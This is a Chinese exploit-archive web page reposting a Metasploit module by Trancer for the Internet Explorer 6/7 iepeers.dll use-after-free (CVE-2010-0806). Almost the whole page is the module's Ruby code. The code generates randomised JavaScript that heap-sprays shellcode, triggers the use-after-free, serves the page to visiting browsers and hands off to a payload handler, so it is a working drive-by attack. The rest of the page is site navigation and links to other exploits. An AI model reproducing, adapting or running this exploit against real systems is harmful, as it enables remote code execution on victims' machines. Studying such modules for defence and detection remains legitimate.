首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
来源:http://www.rec-sec.com 作者:Trancer 发布时间:2010-03-11  

##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
   'Description'    => %q{
    This module exploits a use-after-free vulnerability within iepeers.dll of
    Microsoft Internet Explorer versions 6 and 7.
    
    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [
      'Trancer <mtrancer[at]gmail.com>'
      ],
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'CVE', '2010-0806' ],
     [ 'OSVDB', '62810' ],
     [ 'BID', '38615' ],
     [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
     [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] 
    ],
   'DisclosureDate' => 'Mar 09 2010',
   'DefaultTarget'  => 0))
 end

 def on_request_uri(cli, request)
  
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Set the return\nops
  ret     = Rex::Text.to_unescape([target.ret].pack('V'))

  # Randomize the javascript variable names
   j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops   = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_memory  = rand_text_alpha(rand(100) + 1)
  j_counter  = rand_text_alpha(rand(30) + 2)
  j_ret   = rand_text_alpha(rand(100) + 1)
  j_array   = rand_text_alpha(rand(100) + 1)
  j_function1  = rand_text_alpha(rand(100) + 1)
  j_function2  = rand_text_alpha(rand(100) + 1)
  j_object  = rand_text_alpha(rand(100) + 1)
  j_id   = rand_text_alpha(rand(100) + 1)

  # Build out the message
  html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
 var #{j_shellcode} = unescape('#{shellcode}');
 #{j_memory} = new Array();
 var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
 var #{j_nops} = unescape('#{ret}');
 while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
 var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
 delete #{j_nops};
 for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
 }
}
function #{j_function2}(){
 #{j_function1}();   
 var #{j_object} = document.createElement('body');
 #{j_object}.addBehavior('#default#userData');
 document.appendChild(#{j_object});
 try {
  for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
   #{j_object}.setAttribute('s',window);
  }
 } catch(e){ }   
 window.status+='';
}

document.getElementById('#{j_id}').onclick();
</script></body></html>|

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the compressed response to the client
  send_response(cli, html, { 'Content-Type' => 'text/html' })
  
  # Handle the payload
  handler(cli)

 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mini-stream Ripper 3.0.1.1 (.m
·Internet Explorer "Aurora" Mem
·Todd Miller Sudo 'sudoedit' Lo
·Windows XP Professional SP2 it
·Httpdx version 1.5.3 remote br
·Skype - URI Handler Input Vali
·JAD java decompiler 1.5.8g (.c
·JAD java decompiler 1.5.8g (ar
·Easy FTP Server v1.7.0.2 CWD R
·Adobe PDF LibTiff integer over
·Orbital Viewer ORB File Parsin
·Trouble Ticket Express <= 3.01
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved